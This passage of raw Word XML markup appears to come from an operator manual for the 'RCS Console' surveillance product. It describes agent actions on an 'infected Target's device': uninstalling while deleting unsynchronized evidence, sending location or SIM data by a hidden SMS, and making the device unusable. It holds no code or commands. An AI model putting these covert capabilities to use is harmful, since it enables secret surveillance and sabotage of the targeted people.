                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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Tr="005F512E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2761" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="945">
                <v:shape id="_x0000_i1084" type="#_x0000_t75" style="width:127.5pt;height:47.25pt" o:ole="">
                  <v:imagedata r:id="rId120" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1084" DrawAspect="Content" ObjectID="_1446455299" r:id="rId274"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="00671455" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Uninstall</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00671455" w:rsidRDefault="005F512E" w:rsidP="00EC6F13">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00657193">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Uninstall </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00657193">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ction removes the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00657193">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">gent from the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>infected Target’s device</w:t>
            </w:r>
            <w:r w:rsidRPr="00657193">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00657193">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">All </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>evidences that still need to be synchronized are removed</w:t>
            </w:r>
            <w:r w:rsidRPr="00657193">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w: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RPr="005701FD" w:rsidTr="005F512E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2761" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="005701FD" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="005701FD" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6621" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="005701FD" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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Tr="005F512E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2761" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="930">
                <v:shape id="_x0000_i1085" type="#_x0000_t75" style="width:127.5pt;height:47.25pt" o:ole="">
                  <v:imagedata r:id="rId122" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1085" DrawAspect="Content" ObjectID="_1446455300" r:id="rId275"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="00671455" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Log</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00671455" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F270AB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Log </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00F270AB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ction </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>writes a custom string within the Console.</w:t>
            </w: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RPr="005701FD" w:rsidTr="005F512E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2761" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="005701FD" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="005701FD" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6621" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="005701FD" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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Tr="005F512E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2761" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRDefault="00177AC2" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="945">
                <v:shape id="_x0000_i1086" type="#_x0000_t75" style="width:127.5pt;height:47.25pt" o:ole="">
                  <v:imagedata r:id="rId276" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1086" DrawAspect="Content" ObjectID="_1446455301" r:id="rId277"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="00671455" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Sms</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00671455" w:rsidRDefault="005F512E" w:rsidP="00EC6F13">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F270AB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:r w:rsidR="00177AC2">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Sms</w:t>
            </w:r>
            <w:r w:rsidRPr="00F270AB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00F270AB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ction</w:t>
            </w:r>
            <w:r w:rsidR="003F0A2E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> sends </w:t>
            </w:r>
            <w:r w:rsidR="00EC6F13">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>the</w:t>
            </w:r>
            <w:r w:rsidR="003F0A2E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Position or Sim </w:t>
            </w:r>
            <w:r w:rsidR="00EC6F13">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">card information </w:t>
            </w:r>
            <w:r w:rsidR="003F0A2E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>from the infected Target’s device</w:t>
            </w:r>
            <w:r w:rsidR="00EC6F13">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> to the C</w:t>
            </w:r>
            <w:r w:rsidR="003F0A2E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>onsole. The SMS is hidden from Target’s perspective.</w:t>
            </w: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RPr="005701FD" w:rsidTr="005F512E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2761" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="005701FD" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="005701FD" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6621" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="005701FD" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F512E" w:rsidRPr="006172B5" w:rsidTr="005F512E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2761" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="006172B5" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="006172B5" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="006172B5" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F512E" w:rsidTr="005F512E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2761" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="930">
                <v:shape id="_x0000_i1087" type="#_x0000_t75" style="width:127.5pt;height:47.25pt" o:ole="">
                  <v:imagedata r:id="rId124" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1087" DrawAspect="Content" ObjectID="_1446455302" r:id="rId278"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="00671455" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Destroy</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00671455" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E82461">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Destroy </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00E82461">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ction </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">makes the infected Target’s device </w:t>
            </w:r>
            <w:r w:rsidRPr="00E82461">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>temporarily or permanently unusable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00EC6F13" w:rsidRDefault="00EC6F13" w:rsidP="005F512E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC6F13" w:rsidRDefault="00EC6F13">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="005F512E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The images below show the pop-up windows for the creation of all </w:t>
      </w:r>
      <w:r w:rsidR="00295658">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> different types of Desktop Actions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="005F512E">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>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5F512E" w:rsidTr="00C50CE7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C50CE7" w:rsidRDefault="00C50CE7" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C50CE7" w:rsidRDefault="00732ABF" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.15</w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00A52C9B" w:rsidRDefault="00C50CE7" w:rsidP="00C50CE7">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(Synchronize)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1222" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:249pt;z-index:251816960;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId279" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1222" DrawAspect="Content" ObjectID="_1446455386" r:id="rId280"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="00C50CE7" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00C50CE7" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00C50CE7" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the Action’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00C50CE7" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
